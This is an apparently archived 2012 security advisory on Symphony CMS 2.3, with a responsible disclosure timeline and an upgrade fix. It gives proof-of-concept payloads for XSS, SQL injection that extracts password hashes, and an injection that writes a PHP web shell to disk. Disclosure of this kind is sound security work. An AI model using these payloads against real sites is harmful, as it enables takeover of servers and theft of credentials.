what you don't know can hurt you

Symphony CMS 2.3 XSS / SQL Injection / Disclosure

Symphony CMS 2.3 XSS / SQL Injection / Disclosure
Posted Oct 17, 2012
Authored by Wireghoul | Site justanotherhacker.com

Symphony CMS version 2.3 suffers from cross site scripting, path disclosure, remote shell upload, token brute force, and remote SQL injection vulnerabilities.

tags | exploit, remote, shell, vulnerability, xss, sql injection
MD5 | 4134bf54a368537f2d1d1b1d576c052a

Symphony CMS 2.3 XSS / SQL Injection / Disclosure

Change Mirror Download
Symphony cms 2.3 multiple vulnerabilities

--------------------------------------------------------------------------------------------
20121017 - Justanotherhacker.com : Symphony cms - Multiple vulnerabilities
JAHx122 - http://www.justanotherhacker.com/advisories/JAHx122.txt
--------------------------------------------------------------------------------------------

Symphony is an XSLT-powered open source content management system.
[ Taken from: http://getsymphony.com/ ]


--- Vulnerability description ---
Symphony-cms version 2.3 is vulnerable to several vulnerabilities ranging in
severity from low to high and can result in complete compromise by an
unauthenticated attacker.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: High
Release: Responsible
Vendor: Symphony - http://getsymphony.com
Affected versions: 2.3 (and possibly earlier)

--- Local patch disclosure ---
Direct requests to library files will disclose the full local file path if php is configured
to display errors due to the reliance on the library path being declared in a constant
of global scope outside of the library script.

PoC:
http://host/path/symphony/lib/boot/bundle.php

--- User enumeration ---
The retrive password url http://host/path/symphony/login/retrieve-password/ will display a
helpful error message if the email address entered does not exist in the database.

--- Authentication token brute force ---
Symphony-cms allows a user to login without entering their username and password via
a remote auth url that contains a token made up of the first 8 characters of a sha1 hash
of the user's username and hashed password.

If a user has auth_token_active set to yes in the sym_authors table an attacker can login to
their account by brute forcing a key of [0-9A-F]^8 length.

The url http://host/path/symphony/login/[token]/ ie: http://host/path/symphony/login/a39880be/
for the user "admin" with password "admin".


--- Cross site scripting ---
Reflected:
The email input field supplied to http://host/path/symphony/login/retrieve-password/ is not
sufficiently filtered for malicious characters resulting in reflected cross site scripting.

PoC:
Submit form with email address:
"><script>alert(1)</script>

Reflected:
The email input field supplied to http://host/path/symphony/login/ is not sufficiently
filtered for malicious characters resulting in reflected cross site scripting.

PoC:
username=%22%3E%3C%2Finput%3E%3Cscript%3Ealert%28%27k63ddgb6ra%27%29%3C%2Fscript%3E&password=on

Persistent:
The "From name" preference setting in Symphony-cms (http://host/path/symphony/system/preferences/)
is not sufficiently encoded resulting in persistent cross site scripting.

PoC:
settings%5Bemail_sendmail%5D%5Bfrom_name%5D=Symphony%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

--- Blind sql injection ---
The username field in the authors detail page is not sufficiently filtered when checking
is the username already exists in the system. Resulting in blind sql injection.

PoC:
Edit an author's profile, update the username to include a malicious payload, ie:
username' union select "<?php @system($_REQUEST['cmd']); ?>" FROM sym_authors INTO OUTFILE '/var/www/workspace/haxed.php
where the path to your outfile is based on the local path disclosure.

--- SQL Injection ---
The "page" number supplied when editing blueprints is vulnerable to sql injection.

We can retrieve a users username, hashed password and auth token status with the following PoC:
http://host/path/symphony/bluePRINTs/pages/edit/0%29+union+select+1,2,username,password,5,auth_token_active,7,8,9+from+sym_authors+where+id+=+1+--+/

--- Unrestricted file upload ---
While this appears to be intended functionality for authorised users, combined
with the aforementioned vulnerabilities it becomes trivial to place a backdoor
on the system.

--- Solution ---
Upgrade to version 2.3.1.

--- Disclosure time line ---
17-Oct-2012 - Public disclosure
03-Oct-2012 - Issues patched in upcoming release
18-Sep-2012 - Patch checked into git
17-Sep-2012 - Vendor response
14-Sep-2012 - Vendor notified through email



Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    11 Files
  • 21
    May 21st
    21 Files
  • 22
    May 22nd
    20 Files
  • 23
    May 23rd
    36 Files
  • 24
    May 24th
    2 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close